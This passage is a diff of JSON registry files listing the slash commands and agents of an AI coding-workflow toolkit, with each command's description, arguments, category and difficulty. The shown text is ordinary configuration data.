"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/skill-memory.md"
},
{
"name": "load-skill-memory",
"command": "/memory:load-skill-memory",
"description": "Activate SKILL package for task",
"arguments": "[skill_name] \"task intent\"",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load-skill-memory.md"
},
{
"name": "load",
"command": "/memory:load",
"description": "Load project context via CLI",
"arguments": "[--tool <tool>] \"context\"",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load.md"
},
{
"name": "compact",
"command": "/memory:compact",
"description": "Compact session memory for recovery",
"arguments": "[description]",
"category": "memory",
"difficulty": "Intermediate",
"source": "../../../commands/memory/compact.md"
},
{
"name": "task:create",
"command": "/task:create",
"description": "Generate task JSON from description",
"arguments": "\"task title\"",
"category": "task",
"difficulty": "Intermediate",
"source": "../../../commands/task/create.md"
},
{
"name": "task:execute",
"command": "/task:execute",
"description": "Execute task JSON with agent",
"arguments": "task-id",
"category": "task",
"difficulty": "Intermediate",
"source": "../../../commands/task/execute.md"
},
{
"name": "task:breakdown",
"command": "/task:breakdown",
"description": "Decompose task into subtasks",
"arguments": "task-id",
"category": "task",
"difficulty": "Intermediate",
"source": "../../../commands/task/breakdown.md"
},
{
"name": "task:replan",
"command": "/task:replan",
"description": "Update task with new requirements",
"arguments": "task-id [\"text\"|file]",
"category": "task",
"difficulty": "Intermediate",
"source": "../../../commands/task/replan.md"
},
{
"name": "version",
"command": "/version",
"description": "Display version and check updates",
"arguments": "",
"category": "general",
"difficulty": "Beginner",
"essential": true,
"source": "../../../commands/version.md"
},
{
"name": "enhance-prompt",
"command": "/enhance-prompt",
"description": "Transform prompts with session memory",
"arguments": "user input",
"category": "general",
"difficulty": "Intermediate",
"source": "../../../commands/enhance-prompt.md"
}
],
"agents": [
{ "name": "action-planning-agent", "description": "Task planning and generation", "source": "../../../agents/action-planning-agent.md" },
{ "name": "cli-execution-agent", "description": "CLI tool execution", "source": "../../../agents/cli-execution-agent.md" },
{ "name": "cli-explore-agent", "description": "Codebase exploration", "source": "../../../agents/cli-explore-agent.md" },
{ "name": "cli-lite-planning-agent", "description": "Lightweight planning", "source": "../../../agents/cli-lite-planning-agent.md" },
{ "name": "cli-planning-agent", "description": "CLI-based planning", "source": "../../../agents/cli-planning-agent.md" },
{ "name": "code-developer", "description": "Code implementation", "source": "../../../agents/code-developer.md" },
{ "name": "conceptual-planning-agent", "description": "Conceptual analysis", "source": "../../../agents/conceptual-planning-agent.md" },
{ "name": "context-search-agent", "description": "Context discovery", "source": "../../../agents/context-search-agent.md" },
{ "name": "doc-generator", "description": "Documentation generation", "source": "../../../agents/doc-generator.md" },
{ "name": "issue-plan-agent", "description": "Issue planning", "source": "../../../agents/issue-plan-agent.md" },
{ "name": "issue-queue-agent", "description": "Issue queue formation", "source": "../../../agents/issue-queue-agent.md" },
{ "name": "memory-bridge", "description": "Documentation coordination", "source": "../../../agents/memory-bridge.md" },
{ "name": "test-context-search-agent", "description": "Test context collection", "source": "../../../agents/test-context-search-agent.md" },
{ "name": "test-fix-agent", "description": "Test execution and fixing", "source": "../../../agents/test-fix-agent.md" },
{ "name": "ui-design-agent", "description": "UI design and prototyping", "source": "../../../agents/ui-design-agent.md" },
{ "name": "universal-executor", "description": "Universal task execution", "source": "../../../agents/universal-executor.md" }
],
"categories": ["workflow", "issue", "memory", "task", "general", "cli"]
}

View File

@@ -1,82 +0,0 @@
[
{
"name": "action-planning-agent",
"description": "|",
"source": "../../../agents/action-planning-agent.md"
},
{
"name": "cli-execution-agent",
"description": "|",
"source": "../../../agents/cli-execution-agent.md"
},
{
"name": "cli-explore-agent",
"description": "|",
"source": "../../../agents/cli-explore-agent.md"
},
{
"name": "cli-lite-planning-agent",
"description": "|",
"source": "../../../agents/cli-lite-planning-agent.md"
},
{
"name": "cli-planning-agent",
"description": "|",
"source": "../../../agents/cli-planning-agent.md"
},
{
"name": "code-developer",
"description": "|",
"source": "../../../agents/code-developer.md"
},
{
"name": "conceptual-planning-agent",
"description": "|",
"source": "../../../agents/conceptual-planning-agent.md"
},
{
"name": "context-search-agent",
"description": "|",
"source": "../../../agents/context-search-agent.md"
},
{
"name": "doc-generator",
"description": "|",
"source": "../../../agents/doc-generator.md"
},
{
"name": "issue-plan-agent",
"description": "|",
"source": "../../../agents/issue-plan-agent.md"
},
{
"name": "issue-queue-agent",
"description": "|",
"source": "../../../agents/issue-queue-agent.md"
},
{
"name": "memory-bridge",
"description": "Execute complex project documentation updates using script coordination",
"source": "../../../agents/memory-bridge.md"
},
{
"name": "test-context-search-agent",
"description": "|",
"source": "../../../agents/test-context-search-agent.md"
},
{
"name": "test-fix-agent",
"description": "|",
"source": "../../../agents/test-fix-agent.md"
},
{
"name": "ui-design-agent",
"description": "|",
"source": "../../../agents/ui-design-agent.md"
},
{
"name": "universal-executor",
"description": "|",
"source": "../../../agents/universal-executor.md"
}
]

View File

@@ -1,882 +0,0 @@
[
{
"name": "cli-init",
"command": "/cli:cli-init",
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
"category": "cli",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/cli/cli-init.md"
},
{
"name": "enhance-prompt",
"command": "/enhance-prompt",
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
"arguments": "user input to enhance",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/enhance-prompt.md"
},
{
"name": "issue:discover",
"command": "/issue:discover",
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/discover.md"
},
{
"name": "execute",
"command": "/issue:execute",
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
"arguments": "[--worktree] [--queue <queue-id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/issue/execute.md"
},
{
"name": "new",
"command": "/issue:new",
"description": "Create structured issue from GitHub URL or text description",
"arguments": "<github-url | text-description> [--priority 1-5]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/new.md"
},
{
"name": "plan",
"command": "/issue:plan",
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
"category": "issue",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/issue/plan.md"
},
{
"name": "queue",
"command": "/issue:queue",
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
"arguments": "[--rebuild] [--issue <id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/queue.md"
},
{
"name": "code-map-memory",
"command": "/memory:code-map-memory",
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/code-map-memory.md"
},
{
"name": "compact",
"command": "/memory:compact",
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
"arguments": "[optional: session description]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/compact.md"
},
{
"name": "docs-full-cli",
"command": "/memory:docs-full-cli",
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[path] [--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-full-cli.md"
},
{
"name": "docs-related-cli",
"command": "/memory:docs-related-cli",
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
"arguments": "[--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-related-cli.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs.md"
},
{
"name": "load-skill-memory",
"command": "/memory:load-skill-memory",
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
"arguments": "[skill_name] \\\"task intent description\\",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load-skill-memory.md"
},
{
"name": "load",
"command": "/memory:load",
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
"arguments": "[--tool gemini|qwen] \\\"task context description\\",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load.md"
},
{
"name": "skill-memory",
"command": "/memory:skill-memory",
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/skill-memory.md"
},
{
"name": "style-skill-memory",
"command": "/memory:style-skill-memory",
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
"arguments": "[package-name] [--regenerate]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/style-skill-memory.md"
},
{
"name": "swagger-docs",
"command": "/memory:swagger-docs",
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/swagger-docs.md"
},
{
"name": "tech-research-rules",
"command": "/memory:tech-research-rules",
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/tech-research-rules.md"
},
{
"name": "update-full",
"command": "/memory:update-full",
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-full.md"
},
{
"name": "update-related",
"command": "/memory:update-related",
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
"arguments": "[--tool gemini|qwen|codex]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-related.md"
},
{
"name": "workflow-skill-memory",
"command": "/memory:workflow-skill-memory",
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
"arguments": "session <session-id> | all",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/workflow-skill-memory.md"
},
{
"name": "breakdown",
"command": "/task:breakdown",
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/breakdown.md"
},
{
"name": "create",
"command": "/task:create",
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
"arguments": "\\\"task title\\",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/create.md"
},
{
"name": "execute",
"command": "/task:execute",
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/execute.md"
},
{
"name": "replan",
"command": "/task:replan",
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/replan.md"
},
{
"name": "version",
"command": "/version",
"description": "Display Claude Code version information and check for updates",
"arguments": "",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/version.md"
},
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "api-designer",
"command": "/workflow:brainstorm:api-designer",
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/api-designer.md"
},
{
"name": "artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "auto-parallel",
"command": "/workflow:brainstorm:auto-parallel",
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
"arguments": "topic or challenge description\" [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
},
{
"name": "data-architect",
"command": "/workflow:brainstorm:data-architect",
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/data-architect.md"
},
{
"name": "product-manager",
"command": "/workflow:brainstorm:product-manager",
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-manager.md"
},
{
"name": "product-owner",
"command": "/workflow:brainstorm:product-owner",
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-owner.md"
},
{
"name": "scrum-master",
"command": "/workflow:brainstorm:scrum-master",
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
},
{
"name": "subject-matter-expert",
"command": "/workflow:brainstorm:subject-matter-expert",
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
},
{
"name": "synthesis",
"command": "/workflow:brainstorm:synthesis",
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/synthesis.md"
},
{
"name": "system-architect",
"command": "/workflow:brainstorm:system-architect",
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/system-architect.md"
},
{
"name": "ui-designer",
"command": "/workflow:brainstorm:ui-designer",
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
},
{
"name": "ux-expert",
"command": "/workflow:brainstorm:ux-expert",
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
},
{
"name": "clean",
"command": "/workflow:clean",
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
"arguments": "[--dry-run] [\\\"focus area\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/clean.md"
},
{
"name": "debug",
"command": "/workflow:debug",
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
"arguments": "\\\"bug description or error message\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/debug.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
"arguments": "[--resume-session=\\\"session-id\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/execute.md"
},
{
"name": "init",
"command": "/workflow:init",
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
"arguments": "[--regenerate]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/init.md"
},
{
"name": "lite-execute",
"command": "/workflow:lite-execute",
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-execute.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
"arguments": "\\\"text description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/plan.md"
},
{
"name": "replan",
"command": "/workflow:replan",
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/replan.md"
},
{
"name": "review-fix",
"command": "/workflow:review-fix",
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-fix.md"
},
{
"name": "review-module-cycle",
"command": "/workflow:review-module-cycle",
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-module-cycle.md"
},
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "review",
"command": "/workflow:review",
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review.md"
},
{
"name": "complete",
"command": "/workflow:session:complete",
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/complete.md"
},
{
"name": "list",
"command": "/workflow:session:list",
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/workflow/session/list.md"
},
{
"name": "resume",
"command": "/workflow:session:resume",
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/resume.md"
},
{
"name": "solidify",
"command": "/workflow:session:solidify",
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/solidify.md"
},
{
"name": "start",
"command": "/workflow:session:start",
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/start.md"
},
{
"name": "tdd-plan",
"command": "/workflow:tdd-plan",
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
"arguments": "\\\"feature description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-plan.md"
},
{
"name": "tdd-verify",
"command": "/workflow:tdd-verify",
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
"arguments": "[optional: WFS-session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-verify.md"
},
{
"name": "test-cycle-execute",
"command": "/workflow:test-cycle-execute",
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-cycle-execute.md"
},
{
"name": "test-fix-gen",
"command": "/workflow:test-fix-gen",
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-fix-gen.md"
},
{
"name": "test-gen",
"command": "/workflow:test-gen",
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
"arguments": "source-session-id",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-gen.md"
},
{
"name": "conflict-resolution",
"command": "/workflow:tools:conflict-resolution",
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
"arguments": "--session WFS-session-id --context path/to/context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/conflict-resolution.md"
},
{
"name": "gather",
"command": "/workflow:tools:gather",
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
"arguments": "--session WFS-session-id \\\"task description\\",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/context-gather.md"
},
{
"name": "task-generate-agent",
"command": "/workflow:tools:task-generate-agent",
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-agent.md"
},
{
"name": "task-generate-tdd",
"command": "/workflow:tools:task-generate-tdd",
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
},
{
"name": "tdd-coverage-analysis",
"command": "/workflow:tools:tdd-coverage-analysis",
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
},
{
"name": "test-concept-enhanced",
"command": "/workflow:tools:test-concept-enhanced",
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
},
{
"name": "test-context-gather",
"command": "/workflow:tools:test-context-gather",
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-context-gather.md"
},
{
"name": "test-task-generate",
"command": "/workflow:tools:test-task-generate",
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-task-generate.md"
},
{
"name": "animation-extract",
"command": "/workflow:ui-design:animation-extract",
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/animation-extract.md"
},
{
"name": "workflow:ui-design:codify-style",
"command": "/workflow:ui-design:codify-style",
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/codify-style.md"
